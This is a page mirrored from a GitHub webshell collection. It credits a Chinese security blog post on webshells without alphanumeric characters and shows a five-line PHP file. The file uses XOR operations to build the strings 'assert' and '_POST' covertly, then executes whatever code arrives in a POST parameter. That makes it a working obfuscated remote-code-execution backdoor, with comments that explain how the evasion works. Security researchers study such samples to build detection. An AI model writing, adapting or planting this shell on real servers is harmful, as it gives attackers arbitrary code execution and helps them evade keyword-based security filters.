mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
7fb678b606
from : https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html [!img](https://www.leavesongs.com/media/attachment/2017/02/17/b2ac8554-37f8-448e-bc79-b7213eb2cfb8.6713f3c45766.jpg)
5 lines
217 B
PHP
5 lines
217 B
PHP
<?php
|
|
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
|
|
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
|
|
$___=$$__;
|
|
$_($___[_]); // assert($_POST[_]);
|